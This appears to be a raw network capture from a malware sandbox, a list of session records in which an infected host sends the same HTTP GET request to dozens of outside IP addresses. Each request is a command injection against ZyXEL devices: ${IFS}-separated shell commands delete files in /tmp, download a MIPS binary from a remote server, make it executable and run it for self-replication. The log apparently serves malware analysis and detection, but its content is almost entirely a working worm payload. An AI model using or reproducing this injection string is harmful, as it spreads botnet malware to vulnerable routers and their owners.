                                                Jan 28, 2024 10:16:33.933465004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6644192.168.2.2336734200.68.73.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933485985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6645192.168.2.234127658.236.9.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933527946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6646192.168.2.235781099.1.148.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933547020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6647192.168.2.2342260137.198.208.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933568954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6648192.168.2.2338702145.153.57.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933620930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6649192.168.2.234473847.110.70.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933621883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6650192.168.2.2333754174.212.196.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933644056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6651192.168.2.233640252.23.43.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933665991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6652192.168.2.234263813.229.12.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933698893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6653192.168.2.2358528141.165.11.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933722973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6654192.168.2.2357600158.157.164.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933743954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6655192.168.2.2357246124.250.101.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933785915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6656192.168.2.23423849.105.186.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933799982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6657192.168.2.235376281.61.18.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933825016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6658192.168.2.235740876.235.37.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933852911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6659192.168.2.233692896.82.74.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933907986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6660192.168.2.2350420174.233.52.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933923960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6661192.168.2.2354316218.168.156.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933958054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6662192.168.2.233380277.68.8.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933984995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6663192.168.2.2351552152.27.8.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.933990955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6664192.168.2.235379658.79.69.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934020996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6665192.168.2.2348188174.65.61.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934077024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6666192.168.2.233741269.238.21.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934108973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6667192.168.2.233412818.45.119.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934134960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6668192.168.2.234194658.251.129.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934160948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6669192.168.2.2360214171.0.85.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934190035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6670192.168.2.2345488128.248.222.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934201956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6671192.168.2.235193272.27.89.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934225082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6672192.168.2.234303083.176.95.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934278011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6673192.168.2.234531650.20.88.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934310913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6674192.168.2.236040243.13.105.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934326887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6675192.168.2.2357232198.33.81.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934355974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6676192.168.2.2357468134.203.115.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934380054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6677192.168.2.2347212183.128.104.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934403896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6678192.168.2.2342240205.195.157.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934422970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6679192.168.2.2352126134.251.35.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934437990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6680192.168.2.235989645.12.180.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934465885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6681192.168.2.23330488.249.237.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934503078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6682192.168.2.2338398123.242.67.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934529066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6683192.168.2.2354556121.241.36.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934572935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6684192.168.2.233662650.208.113.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934597015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6685192.168.2.233479670.173.48.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934636116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6686192.168.2.2348834223.147.96.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934648037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6687192.168.2.234208041.234.0.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934694052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6688192.168.2.2344496202.36.17.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934726954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6689192.168.2.234860044.38.113.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934731960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6690192.168.2.2342944110.155.226.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934772968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6691192.168.2.234881274.69.119.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934803009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6692192.168.2.2359972182.170.98.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934823036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6693192.168.2.2360820174.126.155.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934839964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6694192.168.2.2342418104.113.87.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934865952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6695192.168.2.234429686.57.163.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934900045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6696192.168.2.2346092191.39.48.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934931993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6697192.168.2.233950853.160.63.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934962034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6698192.168.2.2356992158.66.207.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934977055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6699192.168.2.235966085.87.22.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.934992075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6700192.168.2.2347960200.23.34.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935024977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6701192.168.2.2353216109.43.136.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935074091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6702192.168.2.233869660.209.40.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935091972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6703192.168.2.2346784128.242.126.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935105085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6704192.168.2.233296023.156.144.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:33.935137033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6705192.168.2.23595384.251.13.121443
                                                TimestampBytes transferredDirectionData
